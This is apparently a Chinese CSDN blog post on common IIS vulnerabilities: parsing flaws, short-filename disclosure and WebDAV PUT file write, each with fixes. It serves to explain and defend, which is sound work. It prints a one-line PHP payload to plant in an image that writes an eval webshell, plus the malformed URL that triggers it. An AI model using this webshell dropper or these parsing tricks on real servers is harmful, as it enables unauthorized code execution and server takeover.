IIS 服务器常见漏洞

最新推荐文章于 2024-05-29 03:00:00 发布
最新推荐文章于 2024-05-29 03:00:00 发布
阅读量9.7k 收藏 18
点赞数 8
分类专栏: 中间件安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42918771/article/details/105178309
版权

IIS 服务器常见漏洞

IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。

文件解析漏洞

1、目录解析漏洞

在 IIS5.x/6.0 中,默认会将 **.asp(*.asa、*.cer、*.cdx )目录下的所有文件当成Asp解析。
在这里插入图片描述 在这里插入图片描述从应用配置中可以看出,他们都是调用了asp.dll进行的解析。
在这里插入图片描述在这里插入图片描述

2、文件名解析漏洞

在 IIS5.x/6.0 中,默认会将 **.asp;(*.asa;.jpg、*.cer;.jpg) 这种格式的文件名,当成Asp解析,是因为服务器默认不解析; 号及其后面的内容,相当于截断。
在这里插入图片描述

漏洞修复:

由于微软并不认为这是一个漏洞,也没有推出IIS 6.0的补丁,因此漏洞需要自己修复。

  1. 限制上传目录执行权限,不允许执行脚本。
  2. 不允许新建目录。
  3. 上传的文件需经过重命名(时间戳+随机数+.jpg等) 注:如果攻击者可以控制上传目录,那么攻击者依然可以利用该漏洞。

3、畸形解析漏洞

IIS7.x版本 在Fast-CGI运行模式下,在任意文件,例:1.jpg后面加上/.php,会将1.jpg 解析为php文件。
我们可以上传图片马,然后在后面加上.php 或者1.php。可以被解析成PHP文件。
或者我们可以在图片马test.jpg中写入下面的代码:

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[pass])?>')?>

上传成功后,直接访问/upload/test.jpg/.php,此时test.jpg将会被服务器当成php文件执行,所以图片里面的代码就会被执行。我们会发现在 /upload 目录下创建了一个一句话木马文件 shell.php 。
在这里插入图片描述

漏洞修复:
配置cgi.fix_pathinfo(php.ini中)为0并重启php-cgi程序
在这里插入图片描述修复后:
在这里插入图片描述
在这里插入图片描述或者是显示NO input file specified:

在这里插入图片描述

IIS 短文件漏洞

Windows 以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件。在cmd下输入"dir /x"即可看到短 文件名的效果。

使用工具检测:
https://github.com/lijiejie/IIS_shortname_Scanner
https://github.com/irsdl/IIS-ShortName-Scanner

修复前:
在这里插入图片描述当访问构造的某个存在的短文件名,会返回404
在这里插入图片描述

修复后:
在这里插入图片描述修复前:
在这里插入图片描述在这里插入图片描述

修复后:
在这里插入图片描述
在这里插入图片描述
不同版本的IIS,返回的信息如下:
在这里插入图片描述修复方法:
IIS短文件漏洞局限性

  1. 如果文件名本身太短也是无法猜解的;
  2. 此漏洞只能确定前6个字符,如果后面的字符太长、包含特殊字符,很难猜解;
  3. 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配;
  4. 如果文件夹名前6位字符带点".",扫描程序会认为是文件而不是文件夹,最终出现误报;
  5. 不支持中文文件名,包括中文文件和中文文件夹。一个中文相当于两个英文字符,故超过4个中文字会产生短文件名,但是IIS不支持中文猜测。
从CMD命令关闭NTFS 8.3文件格式的支持 
Windows Server 2003: (1代表关闭,0代表开启) 
关闭该功能:fsutil behavior set disable8dot3 1

在这里插入图片描述
Windows Server 2008 R2:

查询是否开启短文件名功能:
fsutil 8dot3name query 
关闭该功能:
fsutil 8dot3name set 1 不同系统关闭命令稍有区别,该功能默认是开启的. 2)
或从修改注册表关闭NTFS 8.3文件格式的支持 
快捷键Win+R打开命令窗口,输入regedit打开注册表窗口 
找到路径:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem,
将其中的 NtfsDisable8dot3NameCreation这一项的值设为 1,1代表不创建短文件 名格式

在这里插入图片描述以上两种方式修改完成后,均需要重启系统生效。
Note:此方法只能禁止NTFS8.3格式文件名创建,已经存在的文件的短文件名无法移除,需要重新复制才会消失。
例:将web文件夹的内容拷贝到另一个位置,如c:\www到c:\ww,然后删除原文件夹,再重命名c:\ww到c:\www。

PUT 任意文件写入

IIS Server 在 Web 服务扩展中开启了 WebDAV之后,支持多种请求,配合写入权限,可造成任意文件写入。
在这里插入图片描述在这里插入图片描述开启WebDAV 后:
在这里插入图片描述开启写入权限后,可以成功写入:
在这里插入图片描述关闭后WebDAV 、写入权限之后:
在这里插入图片描述在这里插入图片描述漏洞修复:
关闭WebDAV 和 写权限

BeretSEC
关注
  • 8
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6242
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
IIS的十七个常见安全漏洞
03-03
IIS的十七个常见安全漏洞
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 9017
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
Apache、Nginx、IIS文件解析漏洞
最新发布
qq_68163788的博客
05-29 1065
文件解析漏洞是指在Web服务器(如Apache、Nginx、IIS)中存在的一种安全漏洞,攻击者可以利用该漏洞来执行恶意代码或获取敏感信息。这种漏洞通常涉及服务器错误地解释用户输入的文件或数据,导致攻击者能够访问服务器上的文件系统、执行任意代码或进行其他未经授权的操作。攻击者通常会尝试通过构造特定的恶意请求来利用文件解析漏洞,从而绕过服务器的安全控制机制。
IIS解析漏洞
ve9etable的博客
07-05 3625
目录 one 什么是IIS? 中间件 Web服务器 two IIS的初体验 启动IIS服务 IIS提高安全性的配置 网站搭建 three ISS漏洞利用 WebDAV漏洞 IIS文件解析漏洞 IIS目录解析漏洞 one 什么是IIS? Internet Information Services(互联网信息服务),由微软公司提供的基于运行Microsoft Windows的互联网基本服务 中间件 是介于应用系统和系统软件之间的一类软件,它使用系统软件所提供的基础服务(功能
中间件解析漏洞 - IIS6.0
qq_49433473的博客
05-18 1855
中间件解析漏洞 - IIS6.0 —(文件上传之IIS6.0解析漏洞
web常见中间件漏洞IIS中间件漏洞
qq_52486507的博客
03-30 1122
1.IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。2.IIS一般适用于windows系统,而不适用于其它系统。
IIS常见漏洞攻防介绍
03-02
RDSDatafactory组件默认设置下,会接收并执行IIS服务器上的命令,通常以System用户权限运行。可以通过尝试向目标服务器的80端口发送特定HTTP请求来检测是否存在此漏洞。 **3. IDC & IDA Bugs** IDC和IDA后缀的漏洞...
IIS常见的十八个安全漏洞
03-04
IIS常见的十八个安全漏洞非常危险,攻击者可以通过这些漏洞来攻击 IIS 服务器,执行系统命令,察看文件源代码等。因此,需要及时修复这些漏洞,保护 IIS 服务器的安全。 从上面的描述中,我们可以看到,IIS 中...
iis上传漏洞利用工具
07-06
防止IIS上传漏洞的关键在于保持IIS服务器的更新,确保安装了最新的安全补丁。此外,配置好IIS的文件处理规则也非常重要,避免误解析文件。管理员应严格限制可执行文件的上传目录,并启用日志记录,以便于监控和审计...
iis畸形文件漏洞1
08-08
接着,他们创建一个包含恶意代码的ASP文件并尝试上传,成功后,这个恶意的ASP文件实际上会被IIS服务器执行,而不是作为静态文件存储。 然而,即使上传成功,攻击者还面临另一个问题——网站启用了防盗链功能,阻止...
IIS 服务器 防范攻击3条安全设置技巧
01-20
没关系,通过我们介绍的IIS服务器安全设置的三个方法,就能很好地防范攻击。 基本设置 打好补丁删除共享 个人站长通常使用Windows服务器,但是我们通过租用或托管的服务器往往不会有专门的技术人员来进行安全设置,...
常见漏洞原理简介
A_991128a的博客
06-17 480
无法被Apache解析,就会被Apache服务器解析成php文件,问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下,最后一个x3的没有定义,他会给解析成倒数第二个的x2的定义的扩展名。目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。
IIS7.x漏洞原理和复现
qq_35224240的博客
04-22 5947
一、漏洞环境安装 安装IIS7.x 1)打开控制面板–点击卸载程序 2)打开或关闭Windows功能 3)选择相关要打开的功能 点击确认等待几分钟即可 4)在开始出搜索iis,打开IIS Manager 5)在浏览器访问127.0.0.1显示下面页面表示安装成功 安装小皮 phpstudy 小皮是结合上面IIS7用于复现的,用于联动php和IIS的 当然,也可以不装小皮,通过限制CGI来联动PHP 1)点击安装程序 默认下一步 2)安装VC11 下载地址:https://www.php.cn
IIS put上传漏洞
dqd66的博客
10-17 1443
2.更改后缀(使用copy或者move方法 将上传好的文本文件复制到cmd.asp 中 然后使用中国菜刀连接)会在返回的 Allow 消息头中,包含 PUT,MOVE,COPY 可能存在IIS PUT上传漏洞。导致HTTP支持PUT相关方法,导致IIS上传漏洞 用户可以向指定目录上传任意文件。IIS Put 上传漏洞前提 :1,IIS开启WebDAV。1.上传(使用PUT方法 上传文本文件 1.txt)3,设置站点目录权限,是的IIS用户不具有写入权限。//chopper是密码。IIS put上传漏洞
IIS中间件四大漏洞分析
fansenliangren的博客
12-27 868
关于IIS中间件四大漏洞漏洞原理,漏洞危害,检测条件,检测方法,和修复建议的简要介绍。
关于 IIS短文件名泄露漏洞
zcfeng
11-11 6743
IIS短文件名漏洞修补
初窥渗透--IIS6.0解析漏洞
happy_dw的专栏
07-23 5540
学渗透一定要动手操作,一个简单的动作重复N遍以上就能学会了。     最近在学习一句话木马的使用,加上中国菜刀,真是个居家旅行的必备技能。举例说asp的一句话: a就是连接密码了。(一定要写对chr(97),我看着书写char(97)被坑了一下午...还以为是服务器设置问题)。但是今天我练习的时候遇到了只能上传图片的漏洞,然后就去网上找姿势,就学习了IIS6.0的解析漏洞了。 我
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值